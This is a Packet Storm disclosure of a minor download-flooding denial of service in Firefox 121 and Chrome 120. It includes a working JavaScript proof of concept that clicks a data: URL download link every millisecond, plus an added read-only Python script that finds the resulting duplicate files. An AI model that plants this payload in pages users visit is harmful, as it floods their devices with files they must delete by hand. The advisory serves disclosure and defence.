Firefox 121 / Chrome 120 Denial Of Service

Firefox version 121 and Chrome version 120 may both suffer from a minor denial of service issue with file downloads.

Packet Storm
Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)

Tested on: firefox 121 and chrome 120 on GNU/linux

Date: Thu Jan 18 08:38:28 AM UTC 2024

This is barely a DoS, but since it might affect Chrome too we decided
to disclose it.

If firefox user visits a specially crafted page, then firefox
may create many files in `~/Downloads`,
The user is notified about this in a small dialog, but there is
no option to stop the downloads.

The potential denial of service is that the user must manually
delete the created files and this might be PITA especially on
a phone.

The code basically is:

<pre>
URL = "data:text/plain;,a";//can be very large with no net traffic
link = document.createElement('a');
link.href = URL;
link.download = 'joro_';
document.body.appendChild(link);
function f() {
    if( !confirm("This will ruin your device with probability up to 199.99%"))
        return;
    setInterval("link.click();",1);//dobro
}
f();
</pre>

There is no network traffic and in about 90 seconds firefox 121 created
3434 files at speed about 38 files/second.

google chrome 120 prompts about multiple downloads, and if the user
allows it, it creates files at speed of 4.2 files/second, but
it gives modal prompts, which we couldn't close from the GUI and
had to kill the process.

[Test online][1]: if you are vulnerable

[1]: https://j.ludost.net/download2.html

-- guninski
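For the cleanup side of the issue described above, the following is an added example, not part of the original advisory or of either browser: a read-only triage script that lists bursts of byte-identical files in a download directory, relying on the fact that every file produced from one fixed `data:` URL has the same content. The function names and the thresholds (`min_files`, `max_gap`) are assumptions chosen for illustration.

```python
import hashlib
import os
from collections import defaultdict
from pathlib import Path

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        while block := fh.read(1 << 20):
            h.update(block)
    return h.hexdigest()

def dense_runs(group, min_files, max_gap):
    """Split (mtime, path) pairs, sorted by mtime, wherever the gap exceeds max_gap seconds."""
    runs, current = [], [group[0]]
    for prev, item in zip(group, group[1:]):
        if item[0] - prev[0] <= max_gap:
            current.append(item)
        else:
            runs.append(current)
            current = [item]
    runs.append(current)
    return [[p for _, p in run] for run in runs if len(run) >= min_files]

def find_bursts(directory, min_files=20, max_gap=2.0):
    """Return lists of byte-identical regular files written in one rapid burst.

    Assumed thresholds: the advisory reports 38 and 4.2 files/second, so
    consecutive files from such a page are well under 2 seconds apart.
    """
    by_size = defaultdict(list)
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False):
            st = entry.stat(follow_symlinks=False)
            by_size[st.st_size].append((st.st_mtime, Path(entry.path)))
    bursts = []
    for same_size in by_size.values():
        if len(same_size) < min_files:
            continue  # too few same-sized files to form a burst, skip hashing
        by_hash = defaultdict(list)
        for mtime, path in same_size:
            by_hash[sha256_of(path)].append((mtime, path))
        for group in by_hash.values():
            bursts.extend(dense_runs(sorted(group), min_files, max_gap))
    return bursts

if __name__ == "__main__":
    downloads = Path.home() / "Downloads"
    for burst in find_bursts(downloads) if downloads.is_dir() else []:
        print(f"{len(burst)} identical files, first: {burst[0]}")
```

The script only reports candidates; review the listed paths before deleting anything.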
